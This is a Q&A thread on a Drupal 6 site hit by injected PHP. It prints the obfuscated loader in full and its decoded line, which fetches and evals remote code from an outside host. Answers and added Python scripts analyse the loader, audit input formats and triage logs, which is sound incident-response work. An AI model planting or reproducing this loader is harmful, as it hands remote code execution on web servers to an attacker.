
SQL PHP injection attack in Drupal 6

Today, all the nodes in my Drupal 6 site appeared with this added PHP script:

    <?php $node->nid = 849;
    // Two nested preg_replace() calls with the /e modifier (each one eval()s its
    // replacement). The arithmetic resolves to str_rot13 / base64_decode
    // (27-14 = 13, 12*3+4*7 = 64, 2/2 = 1), so the base64 string is decoded
    // and executed. Left exactly as posted; only the PHP tag delimiters the
    // poster stripped out are put back.
    preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');

    // Template that replaces the node's own output once the loader has run.
    if(@$node->body): ?>
    <?php echo @$node->title;?>
    <?php echo @$node->body;?>
    <?php else:?>

    ... here would go the original text of the node

    <?php endif;?>

(I've removed some symbols to make sure you can correctly read the PHP code.)

So, I guess this means that somebody was able to update the information in the Drupal tables and inject this PHP script.

1 - What is this PHP code doing (if anything)? (Of course apart from preventing the visualization of the node content.)
2 - Any idea of how they managed to do this? Is it a Drupal security leak? A MySQL one?
3 - I guess the only way to repair this is by completely restoring the database...

The guy that made this has really tried to make the code hard to read.

I'm not 100% sure how exactly this works, but the end result of the top line is something like this:

    if(!function_exists('node_update_log'))@eval(@file_get_contents('http://ssedrup.org/at/r_inc.php'));
    if(function_exists('node_update_log'))node_update_log($node);

Whoever made this targeted your site because it's a Drupal site; are you running an up-to-date version? They could be exploiting a known security hole in Drupal / a contributed Drupal module. Are you using PHP filters in your Drupal nodes? This could be the access point.

I took a look at the code linked to, which was made hard to read as well. That is the code that is responsible for updating all of your nodes. It seems like the goal was to show special content for the search engine crawlers by looking at the IP address. That is an SEO strategy known as cloaking.

Anyway, the link to the actual code that is run:

In short, this attack on your site was meant to hide the fact that search engines would index some special content on your site. This is probably made to boost SEO for some site. The one who made this really knew what he wanted to do and how to do it.
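Resolving the obfuscated line statically, as an added example that is not part of this answer or of the original post: the script below folds the arithmetic and string-concatenation tricks, emulates the nested preg_replace() calls whose /e modifier (removed in PHP 7) evaluates the replacement as PHP code by applying the revealed str_rot13 and base64_decode to the literals instead of eval()ing anything, and pulls the fetched URL out of the decoded payload. The regexes are mine and cover only the constructs this particular loader uses; it is not a general PHP evaluator.

```python
"""Statically unwrap the preg_replace('/.../e') loader from the question.

Added example, not code from the original post or from Drupal. It folds the
arithmetic and concatenation tricks, resolves each nested /e replacement by
applying the transform it reveals (str_rot13, base64_decode) to the literal
instead of eval'ing it, and extracts indicators from the decoded payload.
"""
import base64
import codecs
import re

# Constructed input: the injected snippet as posted, with the '<' of the PHP
# tag restored. It is parsed as text and never executed.
INJECTED = r"""<?php $node->nid = 849;
preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');"""

# A PHP single-quoted literal: anything but ' and \, or a backslash escape.
STR = r"'((?:[^'\\]|\\.)*)'"
ARITH = re.compile(r"\((\d+(?:\s*[-+*/]\s*\d+)+)\)")   # (27-14), (12*3+4*7), (2/2)
CONCAT = re.compile(STR + r"\s*\.\s*" + STR)            # 'a'.'b'  ->  'ab'
E_CALL = re.compile(r"preg_replace\('/\^\(\.\*\)\$/e',\s*" + STR + r",\s*" + STR + r"\)")


def eval_arith(expr):
    """Evaluate digits joined by + - * / with normal precedence (no eval())."""
    tokens = re.findall(r"\d+|[-+*/]", expr)
    vals, ops = [int(tokens[0])], []
    for op, num in zip(tokens[1::2], tokens[2::2]):
        num = int(num)
        if op == "*":
            vals[-1] *= num
        elif op == "/":
            vals[-1] //= num
        else:
            ops.append(op)
            vals.append(num)
    total = vals[0]
    for op, val in zip(ops, vals[1:]):
        total = total + val if op == "+" else total - val
    return total


def fold_constants(src):
    """Replace (arithmetic) by its value and join adjacent 'a'.'b' pieces."""
    src = ARITH.sub(lambda m: "'%d'" % eval_arith(m.group(1)), src)
    while True:
        joined = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        if joined == src:
            return src
        src = joined


def php_unescape(s):
    return re.sub(r"\\([\\'])", r"\1", s)   # single quotes honour only \\ and \'


def php_escape(s):
    return s.replace("\\", "\\\\").replace("'", "\\'")


def resolve_e_replacement(repl, subject):
    """Emulate preg_replace('/^(.*)$/e', repl, subject): the backreference is the
    whole subject and repl is PHP source to evaluate. Only the two transforms
    this loader uses are applied; anything else is refused rather than guessed."""
    if repl == "str_rot13('\\1')":
        return codecs.encode(subject, "rot13"), False
    if repl == "eval(base64_decode(\\1))":
        # PHP would eval() the decoded text here; we just hand it back.
        return base64.b64decode(subject).decode(), True
    raise ValueError("unrecognised /e replacement: %r" % repl)


def unwrap(src):
    """Resolve /e calls innermost-first; returns (payload, intermediate strings)."""
    src = fold_constants(src)
    stages = []
    while True:
        m = E_CALL.search(src)       # only matches a call whose args are both literals
        if m is None:
            return src, stages
        out, would_eval = resolve_e_replacement(php_unescape(m.group(1)),
                                                php_unescape(m.group(2)))
        stages.append(out)
        if would_eval:
            return out, stages
        src = src[:m.start()] + "'" + php_escape(out) + "'" + src[m.end():]


def extract_iocs(payload):
    """URLs the loader fetches and the functions it calls."""
    calls = set(re.findall(r"\b([a-z_]\w*)\s*\(", payload)) - {"if"}
    return {"urls": re.findall(r"https?://[^\s'\"]+", payload),
            "calls": sorted(calls)}


if __name__ == "__main__":
    payload, stages = unwrap(INJECTED)
    for i, s in enumerate(stages, 1):
        print("stage %d: %s" % (i, s))
    print(extract_iocs(payload))
```

The URL it recovers is the thing to block at the egress proxy and to search the other sites on the host for; the same script can be pointed at a dump of the node_revisions table to find every body that still carries the loader.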

I assume you've got an up-to-date installation of Drupal and all the modules you're using. That's the biggest thing you need to be sure of: keep an eye on Drupal versions and always upgrade when a security update is released.

However, it's far more likely to be one of your modules that has a security flaw rather than the Drupal core. There have been (and likely still are) flaws in Drupal itself, but the really nasty issues have tended to be in modules.

The reason for this is that modules tend to be written by third parties, who may or may not have a good understanding of good security practice. And whereas the core is used by everyone and gets a lot of developer attention, most modules won't have such broad usage, so they get less development work, less testing and less usage, so bugs are less likely to be spotted.

Have a look at the non-core modules you've used for your site (it might help to edit your question to list them here, on the off chance someone knows something specific).

Use Google to search for "drupal modulename security" or something similar, and see what turns up. Also visit their pages on drupal.org and read the notes there; see how active the project is: when was the module last updated? And how often? How many developers have worked on it? etc. If those figures are low, consider finding an alternative module to do the same job.

If your PHP skills are good enough (and you have the time), you could do a code review of them to see if you can spot anything.

Of course, it may not be a Drupal issue at all. If you're on a shared hosting platform, the box could have been compromised by a security issue on any one of the hosted sites, resulting in all sites on the box being compromised (this happened to me once; not good). But since the code that was injected is Drupal-specific, it would seem that it's likely to be a Drupal hack, so the main suspect must remain your installation.

Hope that helps.

You may have your "input formats" set wrong. Note that the "default" format is the one accessible by everyone. If you set "Full HTML" as "default", you open up your site to many XSS exploits. If you set it to "PHP" you open it up to about everyone. "Default" does not mean that it only becomes the default format, i.e. the one selected already. It implies that everyone, including all those who can comment and post nodes, can insert any kind of PHP.
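One way to check for the input-format exposure this answer describes, as an added example (not from the answer or from Drupal): the script audits the rows of filter_formats, filters and the filter_default_format variable in the shape I assume from the Drupal 6 schema (roles as a comma-delimited list like ",1,2,"; module "filter" delta 0 being the HTML tag limiter and module "php" delta 0 the PHP evaluator), reports every format that anonymous or authenticated users can pick and that runs PHP or leaves HTML unfiltered, and shows the audit passing once the default and the roles are corrected. The sample rows are constructed.

```python
"""Audit Drupal 6 input formats for the "default format is usable by everyone" trap.

Added example, not code from the answer or from Drupal. Table shapes are
assumed from the Drupal 6 schema: filter_formats(format, name, roles),
filters(format, module, delta) and the filter_default_format variable.
Feed it the real rows from a DB cursor to audit a live site.
"""
ANONYMOUS, AUTHENTICATED = 1, 2     # Drupal's built-in role ids

# Constructed sample site: "Full HTML" was made the default, and the PHP
# evaluator is enabled on a format granted to authenticated users.
FILTER_FORMATS = [
    {"format": 1, "name": "Filtered HTML", "roles": ",1,2,"},
    {"format": 2, "name": "Full HTML", "roles": ",3,"},      # rid 3: site admins
    {"format": 3, "name": "PHP code", "roles": ",2,"},
]
FILTERS = [
    {"format": 1, "module": "filter", "delta": 0},   # limit allowed HTML tags
    {"format": 1, "module": "filter", "delta": 1},   # convert line breaks
    {"format": 3, "module": "php", "delta": 0},      # PHP evaluator
]
FILTER_DEFAULT_FORMAT = 2


def roles_for(fmt):
    return {int(r) for r in fmt["roles"].split(",") if r}


def reachable(fmt, rid, default_format):
    """A role gets a format if it is listed on it, or if the format is the site
    default: the default is offered to every role whatever its roles column says."""
    return fmt["format"] == default_format or rid in roles_for(fmt)


def audit_input_formats(formats, filters, default_format):
    """Return (format name, role, problem) for each dangerous format that
    anonymous or authenticated users can select."""
    enabled = {}
    for f in filters:
        enabled.setdefault(f["format"], set()).add((f["module"], f["delta"]))
    findings = []
    for fmt in formats:
        mods = enabled.get(fmt["format"], set())
        runs_php = ("php", 0) in mods
        limits_html = ("filter", 0) in mods
        for rid, who in ((ANONYMOUS, "anonymous"), (AUTHENTICATED, "authenticated")):
            if not reachable(fmt, rid, default_format):
                continue
            if runs_php:
                findings.append((fmt["name"], who, "arbitrary PHP execution"))
            elif not limits_html:
                findings.append((fmt["name"], who, "unfiltered HTML (stored XSS)"))
    return findings


def harden(formats, safe_format):
    """Return (formats, default) with safe_format as the default and the
    untrusted roles removed from every other format."""
    fixed = []
    for f in formats:
        f = dict(f)
        if f["format"] != safe_format:
            keep = sorted(roles_for(f) - {ANONYMOUS, AUTHENTICATED})
            f["roles"] = "," + "".join("%d," % r for r in keep)
        fixed.append(f)
    return fixed, safe_format


if __name__ == "__main__":
    for name, who, problem in audit_input_formats(FILTER_FORMATS, FILTERS, FILTER_DEFAULT_FORMAT):
        print("%-14s usable by %-13s -> %s" % (name, who, problem))
    fixed, default = harden(FILTER_FORMATS, safe_format=1)
    print("after hardening:", audit_input_formats(fixed, FILTERS, default))
```

Note that the PHP format is flagged even though it is not the default: being listed for the authenticated role is enough, since anyone who can register an account then gets code execution.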

In addition to the advice mentioned, you should audit your permissions. It is possible that the hacker found a way in that didn't exploit a security hole (XML-RPC, PHP filter on for non-admins, etc.).

Looking through server logs, potentially limiting to POSTs, may provide some information on how it happened.

It is also possible that the hacker directly accessed the database server and bypassed Drupal itself.
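A first triage pass over the web-server logs of the kind this answer suggests, as an added example (not from the answer or from Drupal): it keeps only POST requests, narrows them to the Drupal 6 paths through which content is created or changed (node/add, node/N/edit, comment/reply, admin/content, the filter settings page, xmlrpc.php; my list, extend it for the site's own modules), and scores each by a non-browser User-Agent or a missing Referer, then counts hits per client. The log lines are constructed in Apache combined format; the nid 849 echoes the one hard-coded in the injected snippet.

```python
"""Triage Apache access logs for the POSTs that could have rewritten the nodes.

Added example, not code from the answer or from Drupal. Sample lines are
constructed; the content-changing path list is an assumption to be extended
for the modules actually installed.
"""
import re
from collections import Counter

SAMPLE_LOG = [
    '203.0.113.7 - - [02/Mar/2011:03:14:07 +0000] "GET /node/849 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [02/Mar/2011:03:15:11 +0000] "POST /?q=node/849/edit HTTP/1.1" 302 0 "-" "Python-urllib/2.6"',
    '198.51.100.23 - - [02/Mar/2011:03:15:12 +0000] "POST /?q=node/850/edit HTTP/1.1" 302 0 "-" "Python-urllib/2.6"',
    '192.0.2.10 - - [02/Mar/2011:09:01:55 +0000] "POST /node/12/edit HTTP/1.1" 302 0 "http://example.org/node/12/edit" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Mar/2011:03:16:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 311 "-" "-"',
    '203.0.113.7 - - [02/Mar/2011:03:16:30 +0000] "GET /user/login HTTP/1.1" 200 2200 "-" "Mozilla/5.0"',
]

# Apache "combined" format; referer and user agent are optional so "common" lines parse too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Paths that create or change content in Drupal 6, with or without clean URLs.
CONTENT_WRITE = re.compile(
    r"(?:^|\?q=|/)(?:node/(?:add|\d+/edit)|comment/(?:reply|edit)|admin/content"
    r"|admin/settings/filters|xmlrpc\.php)"
)
SCRIPTED_UA = re.compile(r"python|curl|wget|libwww|perl|php", re.I)


def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(lines, trusted_ips=frozenset()):
    """Flag POSTs to content-changing paths from untrusted clients, with reasons."""
    hits = []
    for line in lines:
        rec = parse(line)
        if not rec or rec["method"] != "POST" or rec["ip"] in trusted_ips:
            continue
        if not CONTENT_WRITE.search(rec["path"]):
            continue
        reasons = ["POST to content-changing path"]
        ua = rec["ua"] or "-"
        if ua == "-" or SCRIPTED_UA.search(ua):
            reasons.append("non-browser user agent")
        if (rec["referer"] or "-") == "-":
            reasons.append("form POST without referer")   # browsers send one on form submit
        hits.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "reasons": reasons})
    return hits


def by_client(hits):
    """Flagged writes per client; a burst of node edits from one IP is the usual tell."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h["ip"], h["ts"], h["path"], "; ".join(h["reasons"]))
    print(by_client(triage(SAMPLE_LOG)))
```

Pass the editors' known addresses as trusted_ips to drop legitimate edits; what remains is the set of sessions to pull the full request bodies for, if the proxy or mod_security kept them. If the logs show no such POSTs around the time the bodies changed, that supports the answer's last point that the database was written to directly.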

Do not forget to check your permissions. Sometimes a developer forgets to prevent editing by anonymous users, and it can take a while until you find out about it.
